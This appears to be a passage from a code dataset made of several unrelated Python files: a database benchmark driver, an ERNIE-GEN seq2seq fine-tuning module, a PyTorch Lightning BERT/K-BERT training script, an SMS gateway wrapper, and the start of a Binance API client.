bottom=0.10)\n#Saxis('scaled')\npylab.xlim(-os*5/4.,os*5/4.)\npylab.ylim(-os,os)\nplt.plot(S[0],S[1],'go')\nplt.plot(A[0],A[1],'ro')\nplt.plot(B[0],B[1],'bo')\nplt.show()\nplt.grid()","sub_path":"ine/NeaktualneZdrojaky/bodSmer.py","file_name":"bodSmer.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"144026882","text":"import os\nimport logging\n\nimport ArgoQueries\nimport MongoQueries\nimport PJsonQueries\nfrom bench_utils import TestSuite\nfrom Settings import (\n RESULTS_FILENAME,\n DATA_SIZE,\n NUM_BENCH_ITERATIONS,\n)\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(__name__)\n\n###\n# Wipe out JSON Documents generated by nobench_data_gen\n###\ndef remove_argo_json_docs():\n import Settings\n files = [Settings.ARGO_EXTRA_FILENAME, Settings.ARGO_FILENAME]\n for filename in files:\n if os.path.exists(filename):\n os.remove(filename)\n\ndef remove_mongo_json_docs():\n import Settings\n files = [Settings.MONGO_FILENAME, Settings.MONGO_EXTRA_FILENAME]\n for filename in files:\n if os.path.exists(filename):\n os.remove(filename)\n\n\nif __name__ == \"__main__\":\n q1a = ArgoQueries.Query1Argo()\n q2a = ArgoQueries.Query2Argo()\n q3a = ArgoQueries.Query3Argo()\n q4a = ArgoQueries.Query4Argo()\n q5a = ArgoQueries.Query5Argo()\n q6a = ArgoQueries.Query6Argo()\n q7a = ArgoQueries.Query7Argo()\n q8a = ArgoQueries.Query8Argo()\n q9a = ArgoQueries.Query9Argo()\n q10a = ArgoQueries.Query10Argo()\n q11a = ArgoQueries.Query11Argo()\n q12a = ArgoQueries.Query12Argo()\n q13a = ArgoQueries.Query13Argo()\n q14a = ArgoQueries.Query14Argo()\n argo_loader = ArgoQueries.InitialLoadArgo()\n argo_dropper = ArgoQueries.DropCollectionArgo()\n argo_queries = [q1a, q2a, q3a, q4a, q5a, q6a, q7a, q8a, q9a, q10a, q11a, q12a, q13a, q14a]\n argo_include_indexes = range(0, 14)\n argo_skip_indexes = [10]\n argo_test_suite = TestSuite(\n tag='Argo',\n loader=argo_loader,\n cleaner=argo_dropper,\n queries_array=argo_queries,\n include_indexes=argo_include_indexes,\n skip_indexes=argo_skip_indexes,\n )\n\n q1m = MongoQueries.Query1Mongo()\n q2m = MongoQueries.Query2Mongo()\n q3m = MongoQueries.Query3Mongo()\n q4m = MongoQueries.Query4Mongo()\n q5m = MongoQueries.Query5Mongo()\n q6m = MongoQueries.Query6Mongo()\n q7m = MongoQueries.Query7Mongo()\n q8m = MongoQueries.Query8Mongo()\n q9m = MongoQueries.Query9Mongo()\n q10m = MongoQueries.Query10Mongo()\n q11m = MongoQueries.Query11Mongo()\n q12m = MongoQueries.Query12Mongo()\n q13m = MongoQueries.Query13Mongo()\n q14m = MongoQueries.Query14Mongo()\n q15m = MongoQueries.Query15Mongo()\n mongo_loader = MongoQueries.InitialLoadMongo()\n mongo_dropper = MongoQueries.DropCollectionMongo()\n mongo_queries = [q1m, q2m, q3m, q4m, q5m, q6m, q7m, q8m, q9m, q10m, q11m, q12m, q13m, q14m, q15m]\n mongo_include_indexes = range(0, 15)\n mongo_skip_indexes = []\n mongo_test_suite = TestSuite(\n tag='Mongo',\n loader=mongo_loader,\n cleaner=mongo_dropper,\n queries_array=mongo_queries,\n include_indexes=mongo_include_indexes,\n skip_indexes=mongo_skip_indexes,\n )\n\n q1p = PJsonQueries.Query1PJson()\n q2p = PJsonQueries.Query2PJson()\n q3p = PJsonQueries.Query3PJson()\n q4p = PJsonQueries.Query4PJson()\n q5p = PJsonQueries.Query5PJson()\n q6p = PJsonQueries.Query6PJson()\n q7p = PJsonQueries.Query7PJson()\n q8p = PJsonQueries.Query8PJson()\n q9p = PJsonQueries.Query9PJson()\n q10p = PJsonQueries.Query10PJson()\n q11p = PJsonQueries.Query11PJson()\n q12p = PJsonQueries.Query12PJson()\n q13p = PJsonQueries.Query13PJson()\n q14p = PJsonQueries.Query14PJson()\n q15p = PJsonQueries.Query15PJson()\n pjson_loader = PJsonQueries.InitialLoadPJson()\n pjson_dropper = PJsonQueries.DropCollectionPJson()\n pjson_queries = [q1p, q2p, q3p, q4p, q5p, q6p, q7p, q8p, q9p, q10p, q11p, q12p, q13p, q14p, q15p]\n pjson_include_indexes = range(0, 15)\n pjson_skip_indexes = []\n pjson_test_suite = TestSuite(\n tag='PJson',\n loader=pjson_loader,\n cleaner=pjson_dropper,\n queries_array=pjson_queries,\n include_indexes=pjson_include_indexes,\n skip_indexes=pjson_skip_indexes,\n )\n\n run_argo_bench = True\n run_mongo_bench = True\n run_pjson_bench = True\n\n #################################\n #Actual testing area begins here.\n #################################\n if run_argo_bench:\n generate_argo_data = True\n load_argo_data = True\n log.info(\"Beginning Argo Benchmark.\")\n if generate_argo_data:\n log.info(\"Argo Generate new Data flag was true. Attempting to remove JSON docs.\")\n remove_argo_json_docs()\n log.info(\"Generating new data of size: {}.\".format(DATA_SIZE))\n ArgoQueries.generate_data_argo(DATA_SIZE)\n if load_argo_data:\n log.info(\"Cleaning out Argo PostgreSQL.\")\n argo_test_suite.clean()\n log.info(\"Loading new data into Argo PostgreSQL.\")\n argo_test_suite.load_data()\n log.info(\"Running Argo Benchmark Queries.\")\n argo_test_suite.run_bench_queries(NUM_BENCH_ITERATIONS)\n log.info(\"Argo testing suite complete. \")\n\n\n if run_mongo_bench:\n generate_mongo_data = True\n load_mongo_data = True\n log.info(\"Beginning Mongo Benchmark.\")\n if generate_mongo_data:\n log.info(\"Mongo Generate new Data flag was true.\")\n remove_mongo_json_docs()\n log.info(\"Generating new data of size: {}.\".format(DATA_SIZE))\n MongoQueries.generate_data_mongo(DATA_SIZE)\n if load_mongo_data:\n log.info(\"Cleaning out MongoDB.\")\n mongo_test_suite.clean()\n log.info(\"Loading new data into MongoDB.\")\n mongo_test_suite.load_data()\n log.info(\"Running Mongo Benchmark Queries.\")\n mongo_test_suite.run_bench_queries(NUM_BENCH_ITERATIONS)\n log.info(\"Mongo testing suite complete. \")\n\n\n if run_pjson_bench:\n generate_pjson_data = True\n load_pjson_data = True\n log.info(\"Beginning PJson Benchmark.\")\n if generate_pjson_data:\n log.info(\"PJSON Generate new Data flag was true. Using Mongo's data.\")\n if load_pjson_data:\n log.info(\"Cleaning out PostgreSQL JSONB.\")\n pjson_test_suite.clean()\n log.info(\"Loading new data into PostgreSQL JSONB.\")\n pjson_test_suite.load_data()\n log.info(\"Running PJson Benchmark Queries.\")\n pjson_test_suite.run_bench_queries(NUM_BENCH_ITERATIONS)\n log.info(\"PJson testing suite complete. \")\n","sub_path":"benchdriver.py","file_name":"benchdriver.py","file_ext":"py","file_size_in_byte":6420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"196893157","text":"# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport time\nimport argparse\nimport numpy as np\nimport multiprocessing\nimport math\n\nimport paddle\nimport paddle.fluid as fluid\nimport paddle.fluid.layers as layers\n\nfrom six.moves import xrange\n\nfrom model.ernie import ErnieModel\n\nfrom reader.tokenization import BasicTokenizer\nfrom eval.gen_eval import GenerationEval\n\n\nclass ErnieGenFinetune(object):\n def __init__(self, args, ernie_config, tokenizer):\n self.vocab = tokenizer.vocab\n self.inv_vocab = tokenizer.inv_vocab\n self.merge_subword = tokenizer.merge_subword\n self.attn_id = self.vocab[\"[ATTN]\"]\n self.eos_idx = self.vocab[\"[SEP]\"]\n self.ernie_config = ernie_config\n self.weight_sharing = args.weight_sharing\n self.task_type = args.task_type\n self.max_seq_len = args.max_seq_len\n self.use_fp16 = args.use_fp16\n self.label_smooth = args.label_smooth\n self.max_dec_len = args.max_dec_len\n self.beam_size = args.beam_size\n self.tgt_type_id = args.tgt_type_id\n self.continuous_position = args.continuous_position\n self.length_penalty = args.length_penalty\n self.do_decode = args.do_decode\n self.evaluator = GenerationEval(args, self.merge_subword)\n if self.task_type == \"dialog\":\n self.emb_keys = [\"word_embedding\", \"role_embedding\", \"turn_embedding\", \"pos_embedding\"]\n else:\n self.emb_keys = [\"word_embedding\", \"sent_embedding\", \"pos_embedding\"]\n\n def cal_logit(self, enc_out, tgt_pos):\n enc_out = fluid.layers.reshape(x=enc_out,\n shape=[-1, self.ernie_config[\"hidden_size\"]])\n if tgt_pos:\n tgt_pos = fluid.layers.cast(x=tgt_pos, dtype='int32')\n tgt_feat = fluid.layers.gather(input=enc_out, index=tgt_pos)\n else:\n tgt_feat = enc_out\n\n tgt_trans_feat = fluid.layers.fc(\n input=tgt_feat,\n size=self.ernie_config[\"emb_size\"] or self.ernie_config[\"hidden_size\"],\n act=self.ernie_config[\"hidden_act\"],\n param_attr=fluid.ParamAttr(\n name=\"mask_lm_trans_fc.w_0\",\n initializer=fluid.initializer.TruncatedNormal(scale=0.02)),\n bias_attr=fluid.ParamAttr(\n name=\"mask_lm_trans_fc.b_0\",\n initializer=fluid.initializer.Constant(0.)))\n\n tgt_trans_feat = fluid.layers.layer_norm(\n tgt_trans_feat,\n begin_norm_axis=len(tgt_trans_feat.shape) - 1,\n param_attr=fluid.ParamAttr(\n name='mask_lm_trans_layer_norm_scale',\n initializer=fluid.initializer.Constant(1.)),\n bias_attr=fluid.ParamAttr(\n name='mask_lm_trans_layer_norm_bias',\n initializer=fluid.initializer.Constant(1.)))\n\n\n seq2seq_out_bias_attr = fluid.ParamAttr(\n name=\"mask_lm_out_fc.b_0\",\n initializer=fluid.initializer.Constant(value=0.0))\n\n if self.weight_sharing:\n fc_out = fluid.layers.matmul(\n x=tgt_trans_feat,\n y=fluid.default_main_program().global_block().var(\n \"word_embedding\"),\n transpose_y=True)\n fc_out += fluid.layers.create_parameter(\n shape=[self.ernie_config['vocab_size']],\n dtype=\"float32\",\n attr=seq2seq_out_bias_attr,\n is_bias=True)\n else:\n out_size = self.ernie_config[\"tgt_vocab_size\"] or self.ernie_config['vocab_size']\n fc_out = fluid.layers.fc(input=tgt_trans_feat,\n size=out_size,\n param_attr=fluid.ParamAttr(\n name=\"mask_lm_out_fc.w_0\",\n initializer=fluid.initializer.TruncatedNormal(scale=0.02)),\n bias_attr=seq2seq_out_bias_attr)\n\n return fc_out\n\n def to_ternsor(self, shapes, dtypes, lod_levels):\n return [fluid.layers.data(name=\"placeholder_\" + str(i), shape=shapes[i], dtype=dtypes[i], \\\n lod_level=lod_levels[i]) for i in range(len(shapes))]\n\n def create_model(self, decoding=False):\n if decoding:\n return self.infilling_decode()\n\n if self.task_type == \"dialog\":\n emb_num = 4\n else:\n emb_num = 3\n input_shapes = [[-1, self.max_seq_len, 1]] * emb_num + \\\n [[-1, self.max_seq_len, self.max_seq_len]]\n query_input_shapes = [[-1, self.max_seq_len, 1]] * emb_num + \\\n [[-1, self.max_seq_len, self.max_seq_len * 2]]\n input_dtypes = ['int64'] * emb_num + ['float32']\n input_lod_levels = [0] * emb_num + [0]\n shapes = input_shapes + query_input_shapes + [[-1, 1], [-1, 1]]\n dtypes = input_dtypes * 2 + ['int64', 'int64']\n lod_levels = input_lod_levels * 2 + [0, 0]\n\n inputs = self.to_ternsor(shapes, dtypes, lod_levels)\n pyreader = fluid.io.DataLoader.from_generator(feed_list=inputs, capacity=50, iterable=False)\n\n emb_ids =[{}, {}]\n for key, value in zip(self.emb_keys, inputs[:emb_num]):\n emb_ids[0][key] = value\n for key, value in zip(self.emb_keys, inputs[emb_num + 1 : emb_num * 2 + 1]):\n emb_ids[1][key] = value\n\n input_mask, input_query_mask = inputs[emb_num], inputs[2 * emb_num + 1]\n tgt_labels, tgt_pos = inputs[-2:]\n\n ernie = ErnieModel(\n emb_ids=emb_ids,\n input_mask=[input_mask, input_query_mask],\n config=self.ernie_config,\n use_fp16=self.use_fp16,\n task_type=self.task_type)\n\n enc_out = ernie.get_sequence_output()\n fc_out = self.cal_logit(enc_out, tgt_pos)\n\n if self.label_smooth:\n out_size = self.ernie_config[\"tgt_vocab_size\"] or self.ernie_config['vocab_size']\n labels = fluid.layers.label_smooth(\n label=fluid.layers.one_hot(\n input=tgt_labels, depth=out_size),\n epsilon=self.label_smooth)\n\n ce_loss = layers.softmax_with_cross_entropy(\n logits=fc_out, label=labels, soft_label=True)\n #probs = fluid.layers.log(fluid.layers.softmax(fc_out))\n #ce_loss = fluid.layers.kldiv_loss(probs, labels, reduction='batchmean')\n else:\n ce_loss, probs = fluid.layers.softmax_with_cross_entropy(\n logits=fc_out, label=tgt_labels, return_softmax=True)\n\n loss = fluid.layers.mean(x=ce_loss)\n graph_vars = {\"loss\": loss}\n for k, v in graph_vars.items():\n v.persistable = True\n\n return pyreader, graph_vars\n\n def infilling_decode(self):\n if self.task_type == \"dialog\":\n emb_num = 4\n else:\n emb_num = 3\n input_shapes = [[-1, self.max_seq_len, 1]] * emb_num + \\\n [[-1, self.max_seq_len, self.max_seq_len]]\n input_dtypes = ['int64'] * emb_num + ['float32']\n input_lod_levels = [0] * emb_num + [0]\n\n shapes = input_shapes + [[-1, self.max_seq_len, 1], [-1, self.max_seq_len, 1],\n [-1, 1], [-1], [-1, 1, self.max_seq_len], [-1, 1]]\n dtypes = input_dtypes + ['int64', 'int64', 'float32', 'int32', 'float32', 'int64']\n lod_levels = input_lod_levels + [2, 2, 2, 0, 0, 0]\n\n inputs = self.to_ternsor(shapes, dtypes, lod_levels)\n pyreader = fluid.io.DataLoader.from_generator(feed_list=inputs, capacity=50, iterable=False)\n\n emb_ids = {}\n for key, value in zip(self.emb_keys, inputs[:emb_num]):\n emb_ids[key] = value\n\n input_mask = inputs[emb_num] \n tgt_ids, tgt_pos, init_scores, parent_idx, tgt_input_mask, data_ids = inputs[-6:]\n\n ernie = ErnieModel(\n emb_ids=emb_ids,\n input_mask=input_mask,\n config=self.ernie_config,\n use_fp16=self.use_fp16,\n task_type=self.task_type,\n decoding=True,\n gather_idx=parent_idx)\n\n max_len = layers.fill_constant(\n shape=[1], dtype=tgt_ids.dtype, value=self.max_dec_len, force_cpu=True)\n step_idx = layers.fill_constant(\n shape=[1], dtype=tgt_ids.dtype, value=0, force_cpu=True)\n pos_idx = layers.fill_constant(\n shape=[1], dtype=tgt_ids.dtype, value=1, force_cpu=True)\n cond = layers.less_than(x=step_idx, y=max_len) \n while_op = layers.While(cond)\n \n ids = layers.array_write(\n layers.reshape(tgt_ids, (-1, 1)), step_idx)\n pos_biases = layers.array_write(layers.reshape(tgt_pos, (-1, 1)), step_idx)\n scores = layers.array_write(init_scores, step_idx)\n tgt_masks = layers.array_write(tgt_input_mask, step_idx)\n\n with while_op.block():\n pre_ids = layers.array_read(array=ids, i=step_idx)\n pre_ids = layers.reshape(pre_ids, (-1, 1, 1), inplace=True)\n pre_scores = layers.array_read(array=scores, i=step_idx)\n pos_bias = layers.array_read(array=pos_biases, i=step_idx)\n pos_bias = layers.gather(input=pos_bias, index=parent_idx)\n tmp_mask = layers.array_read(tgt_masks, i=step_idx) \n\n def gen_batch_like(value, dtype=\"int64\", shape=[-1, 1, 1], is_scalar=True):\n if is_scalar:\n return layers.fill_constant_batch_size_like(\n input=parent_idx, value=value, shape=shape, dtype=dtype) \n else:\n return layers.elementwise_mul(\n x=layers.fill_constant_batch_size_like(\n input=parent_idx, value=1, shape=shape, dtype=dtype),\n y=value, axis=0)\n\n tmp_mask = layers.gather(input=tmp_mask, index=parent_idx)\n append_0_mask = gen_batch_like(0.0, dtype=tmp_mask.dtype)\n append_1_mask = gen_batch_like(1.0, dtype=tmp_mask.dtype)\n tmp_mask = layers.concat([tmp_mask, append_1_mask], axis=2)\n pre_mask = layers.concat([tmp_mask, append_0_mask], axis=2)\n cur_mask = layers.concat([tmp_mask, append_1_mask], axis=2)\n\n cur_ids = gen_batch_like(self.attn_id)\n pre_pos = gen_batch_like(step_idx, is_scalar=False)\n cur_pos = gen_batch_like(pos_idx, is_scalar=False)\n if self.continuous_position:\n pre_pos = pre_pos + pos_bias\n cur_pos = cur_pos + pos_bias\n\n dec_emb_ids = {\"word_embedding\": layers.concat([pre_ids, cur_ids], axis=1),\n \"pos_embedding\": layers.concat([pre_pos, cur_pos], axis=1)}\n if self.task_type == \"dialog\":\n role_ids = gen_batch_like(0)\n turn_ids = gen_batch_like(0)\n dec_emb_ids[\"role_embedding\"] = layers.concat([role_ids, role_ids], axis=1)\n dec_emb_ids[\"turn_embedding\"] = layers.concat([turn_ids, turn_ids], axis=1)\n else:\n sent_ids= gen_batch_like(self.tgt_type_id)\n dec_emb_ids[\"sent_embedding\"] = layers.concat([sent_ids, sent_ids], axis=1)\n dec_mask = layers.concat([pre_mask, cur_mask], axis=1)\n\n dec_out = ernie.encode(dec_emb_ids, dec_mask, parent_idx, remove_query=True)\n fc_out = self.cal_logit(dec_out[:, 1:, :], None)\n topk_scores, topk_indices = layers.topk(\n input=layers.softmax(fc_out), k=self.beam_size)\n pre_lenpen = layers.pow((5.0 + layers.cast(step_idx, pre_scores.dtype)) / 6.0,\n self.length_penalty)\n cur_lenpen = layers.pow((5.0 + layers.cast(pos_idx, pre_scores.dtype)) / 6.0,\n self.length_penalty)\n accu_scores = layers.elementwise_add(\n x=layers.log(topk_scores), y=pre_scores * pre_lenpen, axis=0) / cur_lenpen\n topk_indices = layers.lod_reset(topk_indices, pre_ids)\n accu_scores = layers.lod_reset(accu_scores, pre_ids)\n selected_ids, selected_scores, gather_idx = layers.beam_search(\n pre_ids=pre_ids,\n pre_scores=pre_scores,\n ids=topk_indices,\n scores=accu_scores,\n beam_size=self.beam_size,\n end_id=self.eos_idx,\n return_parent_idx=True)\n\n layers.increment(x=step_idx, value=1.0, in_place=True)\n layers.increment(x=pos_idx, value=1.0, in_place=True)\n layers.array_write(selected_ids, i=step_idx, array=ids)\n layers.array_write(selected_scores, i=step_idx, array=scores)\n layers.array_write(tmp_mask, i=step_idx, array=tgt_masks)\n layers.array_write(pos_bias, i=step_idx, array=pos_biases)\n\n layers.assign(gather_idx, parent_idx)\n length_cond = layers.less_than(x=step_idx, y=max_len)\n finish_cond = layers.logical_not(layers.is_empty(x=selected_ids))\n layers.logical_and(x=length_cond, y=finish_cond, out=cond)\n\n finished_ids, finished_scores = layers.beam_search_decode(\n ids, scores, beam_size=self.beam_size, end_id=self.eos_idx)\n\n graph_vars = {\n \"finished_ids\": finished_ids,\n \"finished_scores\": finished_scores,\n \"data_ids\": data_ids\n }\n\n for k, v in graph_vars.items():\n v.persistable = True\n\n return pyreader, graph_vars\n\n def post_process_seq(self, seq):\n \"\"\"\n Post-process the beam-search decoded sequence. Truncate from the first\n and remove the and tokens currently.\n \"\"\"\n eos_pos = len(seq)\n for i, idx in enumerate(seq):\n if idx == self.eos_idx:\n eos_pos = i\n break\n seq = seq[1:eos_pos]\n return seq\n\n def evaluate(self, resource, eval_phase, graph_vars, features=None,\n output_path=None, dev_count=1, gpu_id=0,is_pred=False):\n\n exe, program, pyreader = resource[\"exe\"], resource[\"program\"], resource[\"pyreader\"]\n\n if eval_phase == \"train\":\n fetch_list = [graph_vars[\"loss\"].name]\n if \"learning_rate\" in graph_vars:\n fetch_list.append(graph_vars[\"learning_rate\"].name)\n outputs = exe.run(fetch_list=fetch_list)\n np_loss = outputs[0]\n ret = {\"loss\": np.mean(np_loss), \"ppl\": np.exp(np.mean(np_loss))}\n if \"learning_rate\" in graph_vars:\n ret[\"learning_rate\"] = float(outputs[1][0])\n return ret\n\n if self.do_decode:\n return_numpy = False\n outfile = output_path + \"/\" + eval_phase\n outfile_part = outfile + \".part\" + str(gpu_id)\n writer = open(outfile_part, \"w\")\n fetch_keys = [\"finished_ids\", \"finished_scores\", \"data_ids\"]\n else:\n steps = 0\n cost = 0.0\n return_numpy = True\n fetch_keys = [\"loss\"]\n\n fetch_list = [graph_vars[key].name for key in fetch_keys]\n\n pred_list = []\n\n time_begin = time.time()\n pyreader.start()\n while True:\n try:\n outputs = exe.run(program=program, fetch_list=fetch_list,\n return_numpy=return_numpy)\n if not self.do_decode:\n np_loss = outputs[0]\n cost += np.mean(np_loss)\n steps += 1\n else:\n seq_ids, seq_scores, data_ids = outputs\n seq_ids_list, seq_scores_list = [seq_ids], [\n seq_scores] if isinstance(\n seq_ids, paddle.fluid.core.LoDTensor) else (seq_ids, seq_scores)\n\n data_ids = np.array(data_ids).reshape(-1).tolist()\n data_idx = 0\n\n for seq_ids, seq_scores in zip(seq_ids_list, seq_scores_list):\n # How to parse the results:\n # Suppose the lod of seq_ids is:\n # [[0, 3, 6], [0, 12, 24, 40, 54, 67, 82]]\n # then from lod[0]:\n # there are 2 source sentences, beam width is 3.\n # from lod[1]:\n # the first source sentence has 3 hyps; the lengths are 12, 12, 16\n # the second source sentence has 3 hyps; the lengths are 14, 13, 15\n #hyps = [[] for i in range(len(seq_ids.lod()[0]) - 1)]\n #scores = [[] for i in range(len(seq_scores.lod()[0]) - 1)]\n for i in range(len(seq_ids.lod()[0]) -1): # for each source sentence\n start = seq_ids.lod()[0][i]\n end = seq_ids.lod()[0][i + 1]\n max_cand = None\n for j in range(end - start): # for each candidate\n sub_start = seq_ids.lod()[1][start + j]\n sub_end = seq_ids.lod()[1][start + j + 1]\n tokens = [self.inv_vocab.get(idx, \"[UNK]\")\n for idx in self.post_process_seq(\n np.array(seq_ids)[sub_start:sub_end])\n ]\n score = np.array(seq_scores)[sub_end - 1]\n if (not max_cand) or score > max_cand[1]:\n max_cand = (tokens, score)\n\n data_id = data_ids[data_idx]\n data_idx += 1\n pred = self.merge_subword(max_cand[0]) \n writer.write(\"%d\\t%s\\n\" % (data_id, \" \".join(pred).encode(\"utf8\")))\n pred_list.append(pred)\n\n except fluid.core.EOFException:\n pyreader.reset()\n break\n\n eval_result = \"no result\"\n \n if eval_phase=='pred_output':\n # fl = open(\"datasets/squad_qg/output.txt\",\"w\")\n # fl.flush()\n result = []\n text = None\n print(pred_list)\n for p in pred_list:\n text = ' '.join(p)\n result.append(text)\n return result\n # fl.write(text+\" \\n\")\n # fl.close()\n\n\n if not self.do_decode:\n eval_result = \"loss: %f, ppl: %f\" % (cost / steps, np.exp(cost / steps))\n elif is_pred == False :\n writer.close()\n tmp_writer = open(\"%s/%s_dec_finish.%d\" % (output_path, eval_phase, gpu_id), \"w\")\n tmp_writer.close()\n if gpu_id != 0:\n return\n while True:\n ret = os.popen('find %s -maxdepth 1 -name \"%s_dec_finish.*\"' %\n (output_path, eval_phase)).readlines()\n if len(ret) != dev_count:\n time.sleep(1)\n continue\n else:\n break\n\n time_end = time.time()\n # Cai nay y ha \n # sort -t$'\\t' -k1n dev_output.part* |awk -F\"\\t\" '{print $2}'> dev_output\n # print('---------------------------------------------------------------------------------------------------------')\n # print(outfile)\n # print(\"sort -t$\\t -k1n %s.part* |awk -F\\\"\\t\\\" '{print $2}'> %s\" %\n # (outfile, outfile))\n # print('---------------------------------------------------------------------------------------------------------')\n os.system(\"sort -t$\\t -k1n %s.part* |awk -F\\\"\\t\\\" '{print $2}'> %s\" %\n (outfile, outfile))\n os.system(\"rm %s.part*\" % (outfile))\n os.system(\"rm %s/%s_dec_finish.*\" % (output_path, eval_phase))\n\n eval_result = self.evaluator.eval(outfile,\n phase=eval_phase.split(\"_\")[0], features=features)\n print(\"[%s evaluation] %s, elapsed time: %f s\"\n % (eval_phase, eval_result, time_end - time_begin))\n","sub_path":"finetune/seq2seq.py","file_name":"seq2seq.py","file_ext":"py","file_size_in_byte":20962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"629361185","text":"# from typing import List\n\nimport os\nimport sys\nimport torch\n# import logging\nfrom argparse import ArgumentParser\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom pytorch_lightning.callbacks import ModelCheckpoint, LearningRateMonitor\nsys.path.append(os.path.join(os.getcwd(), 'src'))\nfrom utils.parameters import process_parameters_yaml\nfrom data.dataloader import KGDataset, Dataset\nfrom models.k_bert import KBert\nfrom models.bert import Bert\n\n\ndef load_data(args, mode='train'):\n print(f\"Loading Dataset: {args.dataset}\")\n if args.model == 'kbert':\n data = KGDataset(args)\n elif args.model == 'bert':\n data = Dataset(args)\n else:\n raise Exception(\"No model\")\n data.prepare_data()\n data.setup()\n if mode == 'train':\n print(f\"Number of train samples: {data.len_train()}\")\n print(f\"Number of val samples: {data.len_val()}\")\n print(f\"Number of test samples: {data.len_test()}\")\n return data\n\n\ndef load_model(args, params):\n if args.model == 'kbert':\n model = KBert\n elif args.model == 'bert':\n model = Bert\n else:\n raise Exception(\"No model\")\n if args.checkpoint:\n print('Loading Checkpoint')\n checkpoint_path = f'checkpoints/{args.model}/{args.checkpoint}'\n model = model.load_from_checkpoint(checkpoint_path)\n else:\n print(f\"Loading Model: {args.model}\")\n model = model(params)\n return model\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--dataset', default='agnews')#, choices=[\"agnews\"])\n parser.add_argument('--model', default='kbert', choices=[\"kbert\", \"bert\"])\n parser.add_argument('--batch_size', default=16, type=int)\n parser.add_argument('--max_epochs', default=100, type=int)\n parser.add_argument('--lr', default=None, type=float)\n parser.add_argument('--lr_update', default=None, type=int)\n parser.add_argument('--gpus', default=1, type=int)\n parser.add_argument('--checkpoint', default=None, type=str)\n parser.add_argument('--sample_data', default=None, type=int, help=\"size of smaller dataset\")\n parser.add_argument('--overfit', default=False, action='store_true')\n args = parser.parse_args()\n params = process_parameters_yaml()\n\n if args.lr:\n params['learning_rate'] = args.lr\n if args.lr_update:\n params['lr_update'] = args.lr_update\n params['num_classes'] = params[f'{args.dataset}_num_classes']\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n data = load_data(args)\n\n model = load_model(args, params).to(device)\n\n experiment = f'batch_size_{args.batch_size}-max_epoch{args.max_epochs}-sample_{args.sample_data}-overfit_{args.overfit}'\n logger = TensorBoardLogger(save_dir=f'logs/{args.model}', name=experiment)\n checkpoint_callback = ModelCheckpoint(monitor='val_loss',\n dirpath=f'checkpoints/{args.model}/{experiment}',\n filename='{epoch}-{step}-{val_loss:.2f}',\n every_n_val_epochs=1)\n lr_monitor = LearningRateMonitor(logging_interval='epoch')\n\n trainer = Trainer(gpus=args.gpus,\n logger=logger,\n max_epochs=args.max_epochs,\n callbacks=[checkpoint_callback, lr_monitor])\n\n trainer.fit(model, datamodule=data)\n trainer.test(model, datamodule=data)\n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"86578197","text":"#!/usr/bin/env python\n# coding=utf-8\nimport time\nimport json\nimport base64\nfrom urllib import urlencode\nfrom taurusxradius.taurusxlib import apiutils\nfrom taurusxradius.taurusxlib import logger\nfrom taurusxradius.taurusxlib import utils\nfrom taurusxradius.taurusxlib.smsutils import smscn\nfrom taurusxradius.taurusxlib.smsutils import qcloud\nfrom taurusxradius.taurusxlib.smsutils import sendcloud\nfrom taurusxradius.taurusxlib.smsutils import taurusxcloud\nfrom taurusxradius.taurusxlib.btforms import rules\nfrom cyclone import httpclient\nfrom twisted.internet import defer\n\nclass SmsApi(object):\n\n def __init__(self):\n self.gateways = ['taurusxcloud',\n 'smscn',\n 'qcloud',\n 'sendcloud']\n self.smscalls = {}\n\n def get_instance(self, gateway, apikey, apisecret):\n if gateway in self.smscalls:\n return self.smscalls[gateway]\n if gateway == 'smscn':\n self.smscalls[gateway] = smscn.SmsApi(apikey, apisecret)\n elif gateway == 'qcloud':\n self.smscalls[gateway] = qcloud.SmsApi(apikey, apisecret)\n elif gateway == 'sendcloud':\n self.smscalls[gateway] = sendcloud.SmsApi(apikey, apisecret)\n elif gateway == 'taurusxcloud':\n self.smscalls[gateway] = taurusxcloud.SmsApi(apikey, apisecret)\n return self.smscalls.get(gateway)\n\n @defer.inlineCallbacks\n def send_sms(self, gateway, apikey, apisecret, sendphone, tplid, args = [], kwargs = {}):\n if gateway not in self.gateways:\n raise ValueError(u'gateway [%s] not support' % gateway)\n if not rules.is_mobile.valid(sendphone):\n raise ValueError(u'sendsms: %s mobile format error' % sendphone)\n try:\n api = self.get_instance(gateway, apikey, apisecret)\n resp = yield api.send_sms(sendphone, tplid, args=args, kwargs=kwargs)\n defer.returnValue(resp)\n except Exception as err:\n logger.exception(err)\n defer.returnValue(False)\n\n\n_smsapi = SmsApi()\nsend_sms = _smsapi.send_sms","sub_path":"taurusxradius/common/smsapi.py","file_name":"smsapi.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"156286155","text":"#!/usr/bin/env python\nimport csv, time, datetime, os, requests, sys, json, logging, hmac\nBASE_PATH=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_PATH)\nfrom hashlib import sha256\nfrom lib import config, general\n\nendpoint = config.binance().get('BASE_API')\napi_key = config.binance().get('KEY')\nsecret = config.binance().get('SECRET')\n\n# # enable REQUESTS logging\n# logging.basicConfig()\n# 